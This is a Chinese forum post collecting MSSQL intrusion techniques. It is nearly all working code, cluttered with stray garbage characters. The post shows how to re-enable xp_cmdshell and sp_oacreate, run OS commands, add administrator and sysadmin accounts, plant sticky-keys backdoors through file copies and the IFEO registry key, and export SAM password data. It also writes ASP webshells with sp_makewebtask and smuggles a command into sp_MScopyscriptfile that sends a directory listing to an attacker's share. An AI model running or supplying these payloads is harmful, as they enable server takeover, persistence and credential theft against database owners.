1 未能找到存储过程'master..xpcmdshell'. EXEC master.dbo.sp_addextendedproc 后用下面的三种方法,在注入点上执行加个空格和;号
: V- }% Y+ l+ C' t( X) w( L4 f$ `2 @, J恢复方法:查询分离器连接后,
& j2 f+ _$ U2 N3 w9 x第一步执行:EXEC sp_addextendedproc xp_cmdshell,@dllname ='xplog70.dll'declare @o int
3 w9 z5 g2 |6 M第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll' + c& R0 Q* e5 {" |; o- E
然后按F5键命令执行完毕+ A F, ?/ a2 G( y7 u! n( K9 V( Z
4 q$ F" w, D& Y# ]1 u, V; z7 G2 无法装载 DLL xpsql70.dll 或该DLL所引用的某一 DLL。原因126(找不到指定模块。)
5 k3 D1 F9 T/ A$ H* G+ ~' o恢复方法:查询分离器连接后,. s* |; I3 S9 A2 A% a& J/ M1 {
第一步执行:EXEC master.dbo.sp_dropextendedproc "xp_cmdshell"$ ~& T/ F" [4 Z
第二步执行:EXEC master.dbo.sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'
9 w: F7 t, O" ^9 J( d然后按F5键命令执行完毕
( C$ e. q$ F- }9 d- P/ Y: M% @/ o: S/ o( S* n1 {# V' P
3 无法在库 xpweb70.dll 中找到函数 xp_cmdshell。原因: 127(找不到指定的程序。)) e2 h* G {7 S' @* i
恢复方法:查询分离器连接后,
# Z- q6 g( o A. c% T1 S* I3 O第一步执行:exec sp_dropextendedproc 'xp_cmdshell'
& ~4 C( J y1 j第二步执行:exec sp_addextendedproc 'xp_cmdshell','xpweb70.dll'
8 |9 H% [6 i9 @; L然后按F5键命令执行完毕5 ?+ l. t5 v# t8 m
/ \7 Q0 z! S* o4 终极方法.
* y8 B: S# M! Q7 v2 b8 r如果以上方法均不可恢复,请尝试用下面的办法直接添加帐户:! ~- {0 O8 R' s$ k7 P2 A
查询分离器连接后,/ ?9 W& R: }' r
2000servser系统:
n) A- X& n6 U$ A6 }4 u1 Bdeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net user 新用户 密码 /add'
- J2 v, q+ l7 ^5 E
# Q n0 J% J: D" U. v' s& Q/ [. s+ bdeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net localgroup administrators 新用户 /add'
1 J7 [. W& _0 a8 ^$ |
% z# [, P7 R6 g1 Zxp或2003server系统:
6 f7 i, K A( f
" ]1 ?0 |8 j( i. P6 ndeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user 新用户 密码 /add'
/ Z% R* a' C" A5 l* G/ E$ Z' ^0 B' Y4 |1 |! k4 `. f$ a- F
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrators 新用户 /add': |3 E/ V+ @% I8 E
8 [9 Y0 `* k2 L" {% z7 i4 J% N
' }4 L% k* a, b9 A五个SHIFT& y) H6 h! G2 L& {9 q( s
declare @o int exec sp_oacreate 'scripting.filesystemobject', @o out exec sp_oamethod @o, 'copyfile',null,'c:\windows\explorer.exe' ,'c:\windows\system32\sethc.exe';
" r% j: S6 I" m3 S# a& B; @% R' B
declare @oo int exec sp_oacreate 'scripting.filesystemobject', @oo out exec sp_oamethod @oo, 'copyfile',null,'c:\windows\system32\sethc.exe' ,'c:\windows\system32\dllcache\sethc.exe';
9 N9 y9 D- z( @! Y7 q
. a3 H! W3 P1 s T* O* R$ Axp_cmdshell执行命令另一种方法
3 e3 ^4 k6 l- G! A- ~. adeclare @a sysname set @a='xp_'+'cmdshell' exec @a 'net user refdom 123456 /add' ; ~5 J4 q& B4 O3 e# a
" R5 N2 p8 X G4 d$ S
判断存储扩展是否存在) S0 `1 B& N2 e
Select count(*) from master.dbo.sysobjects where xtype='X' and name='xp_cmdshell'
: P% _+ @; U) y$ C$ r& B返回结果为1就OK
+ Z2 r2 ~5 u G2 R3 P( y6 E
6 l% o4 u: F! |3 U! o- A. \2 D4 P# n# J& y
上传xplog70.dll恢复xp_cmdshell语句:
' N1 n. S5 g1 n1 xsp_addextendedproc xp_cmdshell,@dllname='E:\newche2\about\XPLOG70.DLL') N8 }# v/ Y+ C, `! I
% \& `9 M* I! z" B% w否则上传xplog7.0.dll" `" \; B- V( S/ _& B) L7 f& S
Exec master.dbo.addextendedproc 'xp_cmdshell','C:\WinNt\System32\xplog70.dll'7 H+ _2 M. j! l0 I5 c% G
8 Q" U) O$ \* ]$ L1 K! T" e
! P6 v4 Q6 I6 O5 h* T! @ E3 K3 c. F* z+ R$ n& R# R& |6 S
首先开启沙盘模式:
; h1 Q/ P: B8 `. y3 zexec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',17 m) f1 \# B: \. g, R2 [
9 |- H" P8 n9 G& C' P然后利用jet.oledb执行系统命令5 e' M( i3 E, g. K
select * from openrowset('microsoft.jet.oledb.4.0',';database=c:\winnt\system32\ias\ias.mdb','select shell("cmd.exe /c net user admin admin1234 /add")')
( U; _( X" E$ N* ~返回 不能找到c:\windows\system32\ias\ias.mdb错误,用exec master..xp_dirtree 'c:\windows\system32\ias\ias',1,1-- 发现c:\windows\system32\ias\ias.mdb没了,应该是被管理员删掉了,还有另一个mdb也没了: ^& y. G; `7 K
9 B7 E& V% i9 ?5 C, f* E) E
n! r8 |1 H2 w5 F# A4 C- Z7 H" N, o
1 Y1 l: W- u' V% Q恢复过程sp_addextendedproc 如下:
0 p! ^$ J% H! Ucreate procedure sp_addextendedproc --- 1996/08/30 20:13
: @1 A8 `5 v) g ~7 l. B@functname nvarchar(517),/* (owner.)name of function to call */
" F# l6 b Y$ }. ~@dllname varchar(255)/* name of DLL containing function */ " x3 l3 E: x% F
as
8 `& N/ \" D, Y# E" w4 k& fset implicit_transactions off
6 T: a/ l, W. v3 n1 T0 Rif @@trancount > 0
+ F' W' y% f; mbegin ( C) q2 P* I6 q9 w/ K- I4 X7 u; l
raiserror(15002,-1,-1,'sp_addextendedproc')
- c# d" ~+ G% L1 H) g2 _return (1)
! l" U9 m7 p; p+ m; ~5 qend * n+ s, U# i# \8 v
dbcc addextendedproc( @functname, @dllname)
. l5 Q& @. G+ j9 F9 Qreturn (0) -- sp_addextendedproc 8 C% G; p9 E2 X, |4 z7 v7 b
GO
# p3 i, g; U; |: W2 f9 E6 k: j8 B& Z3 d
$ h$ J1 x$ N/ U" i! |* i9 p: u
9 I5 p0 H" s. v5 D: s/ {3 [导出管理员密码文件
5 r. r# T' W4 q( m. r* gsa默认可以读sam键.应该。 b/ @% V8 t6 I
reg export HKLM\SAM\SAM\Domains\Account\Users\000001F4 c:\old.reg
+ a+ |/ a3 J2 K* k% o! d9 wnet user administrator test
' q5 [6 h, Z8 y' f! |3 e5 G: i& N N用administrator登陆.
0 g# r0 X3 d! ^/ `用完机器后
8 O& m6 N& p- w7 U( m, t1 qreg import c:\test.reg
3 j+ W! R0 q7 |: z9 j2 K. b" `根本不用克隆.
. p! U9 P4 i" X! s5 j9 e找到对应的sid. 9 o+ C8 D b5 E# i0 V2 f
* W. ~; t& y! w, ~; L' H6 N
\; U0 d, ~: ?2 ~2 ?' Y/ R! _) a3 Y2 G9 A; k( G( J. d" U) L6 q
恢复所有存储过程2 W5 Y" y- B" b+ [" a, [
use master
9 U3 J7 u# w# T6 ?) N# w. U+ Aexec sp_addextendedproc xp_enumgroups,'xplog70.dll' , _, L( ]$ J( F- O$ z; X
exec sp_addextendedproc xp_fixeddrives,'xpstar.dll'
6 Q0 K" ]" h3 @/ ?exec sp_addextendedproc xp_loginconfig,'xplog70.dll' 7 j+ ~7 J: o" K9 h8 q
exec sp_addextendedproc xp_enumerrorlogs,'xpstar.dll'
" @# `' n: [% l3 h8 [% w' x. Q1 K D, qexec sp_addextendedproc xp_getfiledetails,'xpstar.dll' 6 k+ }5 y% ~' B) a/ T) I- }
exec sp_addextendedproc sp_OACreate,'odsole70.dll'
0 ^+ q2 T$ \1 {* f; m# ^exec sp_addextendedproc sp_OADestroy,'odsole70.dll'
# W8 t/ p6 E: \. T% i$ nexec sp_addextendedproc sp_OAGetErrorInfo,'odsole70.dll' ! E: @5 Q8 K* c* d( d% P/ i
exec sp_addextendedproc sp_OAGetProperty,'odsole70.dll'
, L2 k2 J. o" _1 {4 u( D4 Wexec sp_addextendedproc sp_OAMethod,'odsole70.dll'
0 \! B# z2 \% l# e: H4 E) hexec sp_addextendedproc sp_OASetProperty,'odsole70.dll'
; z4 [- g! J. n; W$ }1 U4 ?exec sp_addextendedproc sp_OAStop,'odsole70.dll' $ J: h8 X! I& q1 W
exec sp_addextendedproc xp_regaddmultistring,'xpstar.dll'
b3 I$ U7 b$ b7 t6 k( Rexec sp_addextendedproc xp_regdeletekey,'xpstar.dll' 1 ?: L! n- g# ^- S
exec sp_addextendedproc xp_regdeletevalue,'xpstar.dll' ; R0 O4 M2 v9 U \
exec sp_addextendedproc xp_regenumvalues,'xpstar.dll'
+ x3 K# H. [5 c4 t" k7 fexec sp_addextendedproc xp_regread,'xpstar.dll'
4 K7 c; O3 }, J5 k9 E ]: e8 ^. jexec sp_addextendedproc xp_regremovemultistring,'xpstar.dll' ) A: w0 D- Q8 ^* f5 P0 H
exec sp_addextendedproc xp_regwrite,'xpstar.dll' * z8 {: v3 V0 ?5 q. h
exec sp_addextendedproc xp_availablemedia,'xpstar.dll'
$ j( }7 {# q; E) p. k) R6 T/ s1 E8 p0 J' X4 e0 S
5 H/ A$ V4 ~3 u8 O! f
建立读文件的存储过程
! |( j. _, P7 Q9 I; N% G9 r& Q7 FCreate proc sp_readTextFile @filename sysname
4 N" x8 J$ g/ P$ `# B! Y6 b5 Vas
# {: z* | w7 P. | _
$ K6 v5 z2 U5 F begin 2 d$ O3 \# t* k" G% T# P
set nocount on
( I4 f+ \5 c+ i' g; j7 e* | Create table #tempfile (line varchar(8000))) a& X; D+ q5 {! P/ M( W3 a* {
exec ('bulk insert #tempfile from "' + @filename + '"')
5 q4 W; n; {' s; T# K0 ^ select * from #tempfile* a) b" Q0 r% v. g
drop table #tempfile
+ ?* D. _* e$ I8 oEnd
: [7 I* K, V1 @0 B; i( t& K7 j ^
' b8 r, R* U: }; c% Qexec sp_readTextFile 'D:\testjun17\Teleweb-Japan\default.asp' 利用建立的存储过程读文件
# Z$ L' p: ?0 D! ?查看登录用户
$ V, N2 K+ i% Y' j( T$ f9 SSelect * from sysxlogins! i3 \& e& V: m6 g: @
, l, C+ F0 w2 k. s' t- h7 z& R把文件内容读取到表中4 H C6 s* \5 ^( l
BULK INSERT tmp from "c:\test.txt"
9 c9 D4 x2 S3 m: T# e3 SdElete from 表名 清理表里的内容& u' a7 k( U" ?2 z! f- _5 s; @4 r
create table b_test(fn nvarchar(4000));建一个表,字段为fn' T# r( J' G, f/ @0 A. b& Q+ ]
Q; b+ l$ Y, W+ D: s
3 d0 Z3 y7 g, ?% P. S7 B G加sa用户; R7 d% K: z0 I* ^- F
exec master.dbo.sp_addlogin user,pass;' x- O, u7 E6 C$ C# W, U# I* H
exec master.dbo.sp_addsrvrolemember user,sysadmin
# |" `1 Y4 o U; }7 D! W9 Q" d3 a
# u5 c) N6 ~& P( B/ r7 ?& @3 I; U' s7 N
# R5 K( q" U$ c6 W o7 p
读文件代码
- K( b; [' \: ?' A3 q0 h: ydeclare @o int, @f int, @t int, @ret int Y' D! r% ^0 M
declare @line varchar(8000)# S2 m/ K- z7 X' W, K1 r: I8 m5 J
exec sp_oacreate 'scripting.filesystemobject', @o out5 s5 ], z$ A5 w7 a6 @/ k
exec sp_oamethod @o, 'opentextfile', @f out, '文件名', 1
6 N+ r8 ~2 P1 [5 Yexec @ret = sp_oamethod @f, 'readline', @line out
. v- z# e) h" ]5 T$ Lwhile( @ret = 0 )
2 v$ w% a( v1 W. W& obegin
; T! g5 Q- w8 v& w0 N+ C7 m6 pprint @line
9 J$ y- H! ~( C, [exec @ret = sp_oamethod @f, 'readline', @line out
% j6 W# O, o- L1 R* send
& m! T& l' z/ i% |' i7 c$ S5 H8 A* q/ T. b& }: |/ C
+ J! d! Y7 P% P7 O4 K% S/ O. f9 M写文件代码:
4 `% V- h2 q& a( N2 {; fdeclare @o int, @f int, @t int, @ret int
9 f" b2 T3 T/ ~5 q ^3 Q3 n; \exec sp_oacreate 'scripting.filesystemobject', @o out
. X- S$ X) M1 s0 F' d0 jexec sp_oamethod @o, 'createtextfile', @f out, 'd:\Program Files\RhinoSoft.com\Serv-U\ServUDaemon.ini', 1; ?3 X" c4 J. ^/ \$ V3 I: u/ ?
exec @ret = sp_oamethod @f, 'writeline', NULL, 《内容》& e- t, y$ C$ |7 q; g
- V X! A( k' C! J
: w. w, m5 N1 o9 x, ?8 P添加lake2 shell: S; {7 o# U% H) V: ]- [; N6 h# h
sp_addextendedproc 'xp_lake2', 'c:\recycler\xplake2.dll'
7 g+ S" @# m5 x% l7 m7 Y8 v8 s; wsp_dropextendedproc xp_lake2
; Q# ?- I- `! U% CEXEC xp_lake2 'net user'
1 [; @3 t# g( ~. x: m1 F4 U, X; z2 z
/ I; g, J9 v: y. r' v' l. @' _5 S# w
得到硬盘文件信息 $ y! I) M. H1 i0 B* J9 }. i
--参数说明:目录名,目录深度,是否显示文件 ( N# ?9 |0 D/ ~+ j
execute master..xp_dirtree 'c:'
/ f& N9 K& z! B% v. i( Hexecute master..xp_dirtree 'c:',1 5 |0 C* M; t. V+ l2 a
execute master..xp_dirtree 'c:',1,1 : G g, A1 _5 p; H. u* u
/ t% u& T y0 ^" G8 t+ l0 ]8 }0 @: w, k
读serv-u配置信息. Q: \4 ?( @# t, F) @0 t' C
exec sp_readTextFile 'd:\Program Files\RhinoSoft.com\Serv-U\ReadMe.txt'
6 R! ?! p6 I# ]" zexec sp_readTextFile 'd:\Program Files\RhinoSoft.com\Serv-U\ServUDaemon.ini'/ h L4 t2 n/ I6 G
" Q& a9 p2 |; j* i1 s+ W; C通过xp_regwrite写SHIFT后门$ z* X! H* z2 O: b" p# `
exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe','debugger','REG_sz','c:\windows\system32\cmd.exe on';--
3 ?. ^8 o# u$ D9 B+ B
! d2 h" F9 i2 T6 @" Q( Y/ E
8 G5 B; C% c7 G- n" G0 H, i9 L1 c1 i2 M- H$ ^) Q/ X" Q
找到web路径然后用exec master.dbo.xp_subdirs 'd:\web\www.xx.com';
$ o& u3 k. t% w Y& fexec sp_makewebtask 'd:\web\www.XXXX.com\XX.asp','select''<%execute(request("SB"))%>'' '备 份一个小马就可以了
6 _; W" v! d8 P( s1 e+ r! G+ i( A: S
EXECUTE sp_makewebtask @outputfile = ‘WEB绝对路径\导出的文件名.asp',@query = 'SELECT 你的字段 FROM 你建的临时表'
H/ D% J6 ?4 T6 I$ ^0 L4 K8 ~, x; b. k( m- X+ n( A) q ~! E
$ i7 q8 X2 Q3 t( b& |' s+ b
9 e8 q$ B, X. l E& Tsql server 2005下开启xp_cmdshell的办法9 g+ a# r6 \4 G
/ ]1 _% c: M9 ~( F
EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;
; `8 h- B" O s% _. a1 z6 x) w# v; i( D* J
SQL2005开启'OPENROWSET'支持的方法:
* H6 Z2 _) I7 l3 z N9 M
! P ?+ X, `9 s6 p! {! d2 Aexec sp_configure 'show advanced options', 1;RECONFIGURE;exec sp_configure 'Ad Hoc Distributed Queries',1;RECONFIGURE;
$ T0 S$ W2 Z1 |5 r" n W3 i3 m1 F4 z# J
SQL2005开启'sp_oacreate'支持的方法:
, V1 B. A4 M7 x- J6 }
0 M; M9 o2 y+ f8 u9 gexec sp_configure 'show advanced options', 1;RECONFIGURE;exec sp_configure 'Ole Automation Procedures',1;RECONFIGURE;
8 k8 z1 c# ~9 q% U) ?! `; s4 C$ a4 |( E- m5 j8 C
8 U* R. z) J% l! e& Q, k3 [ a* i2 P. B3 e" \) H
2 |; Z6 h' F) T: q9 u D# h
( O/ k6 o+ x* C3 W( x
' Q* b" J# z9 }
* ]! d( t; k5 `9 @% `9 [
7 A- b7 i5 X3 n1 D' ~8 p* ]. Y$ i: B+ j! w
9 R8 T3 B. I4 E: ^
) J! s' ?4 |% \! V; |5 |
% R3 M% [9 W" A- s, d( k
& [8 p1 l9 M7 M* y- X: j# V* D
7 O; Y% K) b/ c$ C5 C3 F# n8 V: H& w& e8 Y! @1 D
Q6 X1 [# X$ Y: r
. X6 [& G9 }4 j& A- V5 w- p- O0 [2 v7 y: t# D9 I! v
# S. O$ S# t9 N! W' y7 V8 P6 F I+ r+ f7 b2 p
5 @$ l& V1 ^0 r2 p
, Q) f: }# Y' F: q3 }; Y/ @9 R7 N ^" l- w
7 O6 [" \& b8 i以下方面不知道能不能成功暂且留下研究哈:% p0 y. R/ P3 {7 T# d" M1 U* @
4)9 b! l6 \+ q Z$ b K# f
use msdb; --这儿不要是master哟0 J7 G: K5 m$ {1 ~+ g$ }4 z
exec sp_add_job @job_name= czy82 ;
& f# Z! {0 r1 m) X Wexec sp_add_jobstep @job_name= czy82 ,@step_name = Exec my sql ,@subsystem= CMDEXEC ,@command= dir c:\>c:\b.txt ;! C1 ^$ n( x- Q5 B, [8 d- C
exec sp_add_jobserver @job_name = czy82 ,@server_name = smscomputer ;
3 M. a" G4 g- A7 Yexec sp_start_job @job_name= czy82 ;8 h4 r( C6 r' ?
: v# E1 H; j/ Q0 b; U- v
利用MSSQL的作业处理也是可以执行命令的而且如果上面的subsystem的参数是tsql,后面的我们就可以
2 p8 f8 g, e D1 I- _7 [执行tsql语句了.
0 |8 f$ |- L; H/ c! T对于这几个储存过程的使用第一在@server_name我们要指定你的sql的服务器名1 Y# f4 E4 b! P
第二系统的sqlserveragent服务必须打开(默认没打开的气人了吧)
! T0 y) O; B1 {net start SQLSERVERAGENT+ ? m% W; v) [& F
* k. v4 b9 x5 K# m* X4 n对于这个东东还有一个地方不同就是public也可以执行..同这儿也是有系统洞洞的看下面的" O+ M+ B+ R% M. h g7 T
USE msdb. `6 B/ ^. ]) v6 Y7 i' e0 K* Q! v
EXEC sp_add_job @job_name = GetSystemOnSQL ,
N4 A1 I& B, s@enabled = 1,
; e0 K5 f( J5 K@description = This will give a low privileged user access to c8 t8 C/ L* M
xp_cmdshell ,
2 K& G$ b8 ^; c7 D@delete_level = 1- \# f% k! y( ^0 u, E! ~" D+ ]
EXEC sp_add_jobstep @job_name = GetSystemOnSQL ,
8 g% j8 P& r$ f$ S8 Z" \@step_name = Exec my sql ,
* ~4 M z9 r& }' ~ f/ f- j" I0 K@subsystem = TSQL ,! Y$ S+ i1 C8 X. [
@command = exec master..xp_execresultset N select exec
6 k* ]8 Q% G8 W, {7 ^; x% Imaster..xp_cmdshell "dir > c:\agent-job-results.txt" ,N Master - t. a& f6 v3 L
EXEC sp_add_jobserver @job_name = GetSystemOnSQL ,6 ^: W- _6 }7 D* U
@server_name = 你的SQL的服务器名 g. t( f. y1 }4 q1 b) o* @
EXEC sp_start_job @job_name = GetSystemOnSQL
9 i- y: s3 @3 d1 s$ j% u3 ~. a4 g4 t1 ]$ ~. T4 l
不要怀疑上面的代码,我是测试成功了的!这儿我们要注意xp_execresultset就是因为它所以" ]9 r1 f. e: f/ a$ O. u) F8 g" w
才让我们可以以public执行xp_cmdshell
( Y$ @ }6 j0 U i6 `' f% |7 P
6 O' C. g& ]7 a* F& V/ }5)关于Microsoft SQL Agent Jobs任意文件可删除覆盖漏洞(public用户也可以)
) G" |& [4 W& N0 {, S$ {* [- f在安焦有文章:http://www.xfocus.net/vuln/vul_view.php?vul_id=29685 |. @: L @& ?% o$ w8 T
& K, J) I8 P: [, z4 G7 {, X v$ jUSE msdb4 A/ N& i }, B, O+ W2 M1 L9 \6 Y
EXEC sp_add_job @job_name = ArbitraryFilecreate ,; Z! ]* k: ]9 G0 F; u. f
@enabled = 1,
9 ?* F' ?* L9 h/ I _% g@description = This will create a file called c:\sqlafc123.txt ,# q* Y2 ~+ I- T. H0 O$ J
@delete_level = 1& `$ Y1 c# l" s0 V7 \+ \8 I
EXEC sp_add_jobstep @job_name = ArbitraryFilecreate ,1 \ u+ ^7 ?& f
@step_name = SQLAFC ,
/ f' }6 J! S z9 _6 Z, E. q@subsystem = TSQL ,
- v1 [( Z. O/ Q0 R9 Q d3 g@command = select hello, this file was created by the SQL Agent. ,
- n' H5 X2 _ K3 i@output_file_name = c:\sqlafc123.txt
/ r5 g: w, |. d# y( V# VEXEC sp_add_jobserver @job_name = ArbitraryFilecreate ,2 M1 o. L; H6 q
@server_name = SERVER_NAME
1 R8 r6 f1 u( AEXEC sp_start_job @job_name = ArbitraryFilecreate p# ^' k' a$ e, @5 G0 y5 T
9 Y% T: I. q' q1 z; k8 U如果subsystem选的是:tsql,在生成的文件的头部有如下内容
. D8 w& F) j b5 l, y7 V
+ ^! j3 L! J7 ~8 N* L6 U) K( T) y??揂rbitraryFilecreate? ? 1 ?,揝QLAFC? ???? 2003-02-07 18:24:19& e0 v0 U, B7 u; T. k
----------------------------------------------# N' D8 c' M( ^8 r0 P) O$ I3 H
hello, this file was created by the SQL Agent./ B; L6 a' C, E$ y3 F: |2 _/ H; t
/ f" X4 r6 C6 @$ s* ^(1 ?????)+ `; z4 f' R' P/ C) l; f) G
4 U R3 d* L8 P7 P所以我建议要生成文件最好subsystem选cmdexec,如果利用得好我们可以写一个有添加管理员1 G; U g( z* ]+ C: B3 f" d9 N
命令的vbs文件到启动目录!
* B' _; ]+ E& H0 a! Q5 j W) _
! y, H, j' J3 T' O e6)关于sp_makewebtask(可以写任意内容任意文件名的文件)
. T: }% H9 z1 g9 ?# v关于sp_MScopyscriptfile 看下面的例子
' u, P+ i' s) [' ?1 f/ gdeclare @command varchar(100) # }. A$ A1 e O% p, f
declare @scripfile varchar(200)
( h& t* Y+ a' x4 W! Lset concat_null_yields_null off 2 v* ~' n( b- z4 A$ f: m
select @command= dir c:\ > "\\attackerip\share\dir.txt" ( Q' ]! G, K2 N4 O" ?
select @scripfile= c:\autoexec.bat > nul" | @command | rd " 5 ], c2 _6 w- o+ \3 a
exec sp_MScopyscriptfile @scripfile , 8 ^/ C/ l6 p g7 S2 p# Z
! U9 V; {2 n) V; x9 d/ C+ p这两个东东都还在测试试哟* c: A4 V7 o$ I+ F) c- u( X) O3 Z
让MSSQL的public用户得到一个本机的web shell
g5 k# h7 O) [/ n/ [& H6 W- T: J" K: ^, t
sp_makewebtask @outputfile= d:\sms\a.asp ,@charset=gb2312,
& a$ J- w4 B+ Y' h; j3 W0 Z; d--@query= select <img src=vbscript:msgbox(now())> 0 z/ J2 C. _+ T$ ]7 h" Y3 `9 T
--@query= select <%response.write request.servervariables("APPL_PHYSICAL_PATH")%>
& k3 `0 Z- q2 C* b7 Y8 _% q. m" L@query= select
, u, U( Q$ b% a( Y5 N<%On Error Resume Next
( G9 S9 e' l8 p, i# dSet oscript = Server.createObject("wscript.SHELL") $ D! T# m3 e# t' z }& Z
Set oscriptNet = Server.createObject("wscript.NETWORK")
& `( g; [: u. S# h2 T' \% h& ?6 I+ BSet oFileSys = Server.createObject("scripting.FileSystemObject") ' f7 l1 v1 w4 z( ^" A1 N8 [* k% u
szCMD = Request.Form(".CMD") ' q( Y8 o* D$ X5 Q9 ~/ H
If (szCMD <>"")Then
" m; w+ Z5 s9 p7 O+ G, l% CszTempFile = "C:\" & oFileSys.GetTempName()
$ Z; E) t! o* G9 M8 z. KCall oscript.Run ("cmd.exe /c " & szCMD & " > " & szTempFile, 0, True) 8 b) u/ U& S0 m4 ?4 V& G
Set oFile = oFilesys.OpenTextFile (szTempFile, 1, False, 0) : Q+ S9 Q$ J% r3 F7 T
End If %>
& d, L0 W" y' T2 k+ x: B<HTML><BODY><FORM action="<%= Request.ServerVariables("URL")%>" method=" OST"> 2 d% ?1 x, P& ^2 Z; `, k
<input type=text name=".CMD" size=45 value="<%= szCMD %>"><input type=submit value="Run">
" d- q* I' _% L u+ s& \( |</FORM><RE> - Y' S( c9 F# A/ [$ I! r
<% If (IsObject(oFile))Then
2 L+ f( e) X; p0 \On Error Resume Next
8 P0 g' ^: E1 M& T1 {' d4 j( g8 kResponse.Write Server.HTMLEncode(oFile.ReadAll)
9 q$ w4 o9 H$ x/ q/ b* n2 r4 J ooFile.Close
% {" f5 E# s2 f: b- tCall oFileSys.deleteFile(szTempFile, True)
- D9 x0 J2 o- `$ `) C' xEnd If%>
' M& b. h5 |8 L</BODY></HTML> ' y- _7 @9 l: N
|
发表于 2012-9-15 14:37:30
收藏
支持
反对